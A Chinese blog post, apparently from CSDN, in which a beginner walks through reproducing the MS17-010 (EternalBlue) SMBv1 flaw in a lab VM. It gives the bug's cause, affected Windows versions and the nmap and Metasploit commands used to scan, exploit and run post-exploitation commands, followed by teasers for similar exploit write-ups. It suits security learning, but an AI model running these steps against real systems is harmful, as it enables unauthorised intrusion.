新手第一个漏洞复现:MS17-010(永恒之蓝)

原创 已于 2024-06-28 13:59:08 修改 · 472 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #MS17_010 #漏洞复现 #kali

于 2024-06-28 13:58:40 首次发布

文章目录

漏洞原理

漏洞出现在Windows SMB v1中的内核态函数srv!SrvOs2FeaListToNt在处理FEA(File Extended Attributes)转换时。该函数在将FEA list转换成NTFEA(Windows NT FEA)list前,会调用srv!SrvOs2FeaListSizeToNt去计算转换后的FEA list的大小。由于错误地使用WORD强制类型转换,导致计算出来的待转换的FEA list的大小比真正的FEA list大。当FEA list被转化为NTFEA list时,会在非分页池导致缓冲区溢出。

漏洞影响范围

目前已知受影响的Windows版本包括但不限于:Windows NT, Windows 2000, Windows XP, Windows 2003, Windows Vista, Windows 7, Windows 8, Windows 2008, Windows 2008 R2, Windows Server 2012 SP0等。

复现环境

  1. 任意一台受漏洞影响版本的虚拟机,本次实验采用 Windows 2008 R2
  2. kali(nmap msf)

复现步骤

1.搭建好虚拟机环境(正确安装Windows 2008 R2)和kali(kali自带nmap和msf)

Windows 2008 R2:
在这里插入图片描述

kali:
在这里插入图片描述

2.用nmap扫描主机,判断版本和是否开启了445端口
在这里插入图片描述
从图中可以看出,版本为windows2008 R2,并且开启了445端口,可能存在永恒之蓝漏洞。

3.msfconsole进入msf,找到ms17_010的模块并且use 3,run一下扫描是否存在漏洞
在这里插入图片描述在这里插入图片描述
4.设定攻击载荷并且开始攻击
在这里插入图片描述
5.成功拿shell
在这里插入图片描述
6.简单拍个照片保存到kali机器上
在这里插入图片描述
命令参考:
Nmap:nmap -A -sS -sV 192.168.153.130
MSF:
msfconsole
search ms07_010
use 3
set RHOST 192.168.153.130
run
use 0
set RHOST 192.168.153.130
run
cmd命令:
sysinfo
whoami
arp
netstat
route print

[系统安全] 十八.病毒攻防机理及WinRAR恶意劫持漏洞(bat病毒、自启动、定时关机、蓝屏攻击)
杨秀璋的专栏
02-03 7123
作者前文介绍了Windows PE病毒, 包括PE病毒原理、分类及感染方式详解;这篇文章将讲解简单的病毒原理和防御知识,并通过批处理代码和漏洞(CVE-2018-20250)利用让大家感受下病毒攻击的过程,提出了安全相关建议,包括自动启、修改密码、定时关机、蓝屏、进程关闭等功能。 这些基础性知识不仅和系统安全相关,同样与我们身边常用的软件、操作系统紧密联系,希望这些知识对您有所帮助,更希望大家提高安全意识,安全保障任重道远。
ms17-010 永恒之蓝
bazzza的博客
12-22 305
永恒之蓝漏洞利用 简介 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。 恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不
永恒之蓝MS17-010复现
m0_74795359的博客
06-12 360
永恒之蓝(EternalBlue)是一个针对Microsoft Windows系统SMB协议漏洞的计算机攻击工具,漏洞编号为CVE-2017-0144,属于Microsoft安全公告MS17-010中描述的远程代码执行漏洞。该漏洞允许攻击者在无需用户交互的情况下,通过向目标系统的SMB服务发送特制数据包来获得系统控制权。2017年4月,黑客组织"影子经纪人"公开泄露了这个工具,使得该漏洞被广泛利用于恶意攻击活动。
MSF 每日一练】MS17-010永恒之蓝
2301_79577213的博客
05-11 1142
本文介绍了Metasploit Framework(MSF)的基本使用方法和MS17-010永恒之蓝漏洞的利用过程。MSF是一个开源的渗透测试框架,集成了多种漏洞利用模块、辅助模块和后渗透工具,适合初学者学习。文章详细讲解了MSF的主要组件、基本命令和使用流程,并通过MS17-010漏洞的实例,展示了从信息收集、漏洞扫描到漏洞利用、后门植入的完整渗透测试过程。通过本文,读者可以初步掌握MSF的基本操作和渗透测试的基本思路。
永恒之蓝ms-17-010
尘玥的故事
07-18 880
2.saerch ms17-010 #命令搜索漏洞编号ms17-010相关模块。来到这个页面后的第一部是按键盘上的“i”键,左下角出现“插入”后说明操作正确。从下面的源内选择一个复制下来准备粘贴进去(都是优质源,复制哪个都可以)。尝试运行一个:screenshare—实时监控当前主机界面。换源vim /etc/apt/sources.list。-P:指定端口扫描(0-65535为全端口)使用“#”将原本的源给注释掉。-sC:使用内置脚本进行扫描。-sT:TCP全连接扫描。-sV:识别服务版本。
永恒之蓝(MS17-010)
人们并不感谢罗辑
08-06 1689
SMB协议SMB是一个协议服务器信息块,它是一个客户机/服务器,请求/响应协议,通过SMB协议可以在计算机间共享文件,命名管道等资源,电脑上网上邻居就是靠SMB实现的;
网络安全 基础之 Windows漏洞复现MS17-010永恒之蓝
weixin_60888404的博客
06-01 2513
Windows经典漏洞 永恒之蓝复现
永恒之蓝复现-网络安全新手的兴趣以及小知识
Mjj567的博客
03-22 572
复现永恒之蓝
Nacos身份绕过漏洞(QVD-2023-6271)复现学习
cc123489ll的博客
06-06 1208
本文仅做复现,不做分析!其实就是默认keyshiro550exchange的jwt伪造等,都是类似的问题。Nacos是一个易于使用的平台,专为动态服务发现和配置以及服务管理而设计。可以帮助您轻松构建云原生应用程序和微服务平台。目前Nacos身份认证绕过漏洞(),开源服务管理平台Nacos在默认配置下未对进行修改,导致远程攻击者可以绕过密钥认证进入后台,造成系统受控等后果。基本上都受到了影响,最新的版本已修复漏洞
技术分享-ueditor漏洞利用&源码分析超详细分析
cc123489ll的博客
06-25 543
UEditor是一款基于web技术的所见即所得富文本编辑器,广泛应用于各种web应用中。但是,近年来,由于其漏洞导致的安全问题也受到了广泛关注。本文将详细介绍ueditor的漏洞利用及其C#版本的源码解析。 1.漏洞简介 ueditor的漏洞主要存在于其上传功能中,攻击者可以利用上传漏洞将恶意脚本上传到服务器,从而获取服务器的控制权或者进行其他恶意行为。攻击者一般通过修改上传文件的后缀名或者修改文件内容的方式来绕过服务器的安全检测。 ueditor的上传功能在其server下的文件Uploader.cs中实
Metasploit永恒之蓝ms17_010
最新发布
m0_62908421的博客
07-16 772
MS17-010永恒之蓝)是Windows SMBv1协议中的高危漏洞,允许远程代码执行,CVSS评分为10.0。漏洞源于SrvOs2FeaListSizeToNt函数的内存计算错误,攻击者通过构造畸形FEALIST数据包触发堆溢出,覆盖关键指针并注入内核级Shellcode。典型攻击链包含Grooming内存布局、溢出覆盖SRVNET_BUFFER_HDR结构、APC注入执行Payload等步骤,利用工具如Metasploit可实现自动化攻击。
网络安全入门第一课—永恒之蓝ms17-010
m0_56088051的博客
07-13 7104
一、永恒之蓝(Eternal Blue)永恒之蓝相关病毒,其实是利用了微软的MS17-010漏洞MS17-010是Windows系统一个底层服务的漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序二、实验环境。
Metasploit-MS17-010永恒之蓝 EternalBlue )复现
5L2g556F5ZWl77yf
09-09 1445
一. 概述 此安全更新程序修复了 Microsoft Windows 中的多个漏洞。如果攻击者向 Windows SMBv1 服务器发送特殊设计的消息,那么其中最严重的漏洞可能允许远程执行代码。 对于 Microsoft Windows 的所有受支持版本,此安全更新的等级为“严重”。有关详细信息,请参阅受影响的软件和漏洞严重等级部分。 此安全更新可通过更正 SMBv1 处理经特殊设计的请求的方式来修复这些漏洞。 有关这些漏洞的详细信息,请参阅漏洞信息部分。 EternalChampion 永恒冠军(CVE-
MS17-010远程溢出漏洞(永恒之蓝)
小小猪的博客
06-10 501
MS17-010远程溢出漏洞(永恒之蓝) 实验环境 操作机:kali 2017 操作机IP:172.16.11.2 目标机:windows7 目标机IP:172.16.12.2 打开nmap进行扫描目标主机开放哪些端口 终端打开msfconsole 使用search 命令查找ms17-010漏洞相关模块 使用use 命令选择我们要使用的扫描模块 在运行模块之前,需要设置相关选项,我们使用show options 查看配置信息 需要设置目标地址,设置命令 设..
永恒之蓝漏洞ms17-010
weixin_65336001的博客
05-01 2070
什么是永恒之蓝漏洞?利用ms17-010漏洞攻击Windows7复现超细教程
记录MS17-010(CVE-2017-0146)永恒之蓝漏洞复现
2301_79855883的博客
04-10 211
使用 模块24 对目标主机进行扫描,RHOSTS为目标主机,利用set 命令设置,之后就可以run了。发现存在,ms17-010使用模块0,设置RHOSTS,并查看选项。用set payload payload进行设置payload。输入search ms17 -010搜索利用该漏洞得脚本工具。利用show payloads显示payload。1.使用nmap去扫描探测目标是否存在。输入msfconsole启动msf。
MS17-010(Eternal blue永恒之蓝漏洞利用+修复方法
热门推荐
ElsonHY的博客
11-22 9万+
MS17-010(Eternal blue永恒之蓝漏洞利用+修复方法前言0x01 准备工作0x02 漏洞利用0x03 修复方案总结 前言 提到操作系统漏洞,大家肯定听说过耳熟能详的永恒之蓝MS17-010)了,他的爆发源于WannaCry勒索病毒的诞生。 该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的危险漏洞“EternalBlue”(永恒之蓝)进行传播 。勒索病毒肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。最新统计数据显示,
复现经典漏洞MS08-067分析与影响
本文主要介绍了Windows系统中的一个经典漏洞——MS08-067,以及如何复现这一漏洞,适合初学者学习和研究。漏洞MS08-067是由于Windows Server服务处理远程过程调用(RPC)请求时存在的缓冲区溢出问题,影响了多个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值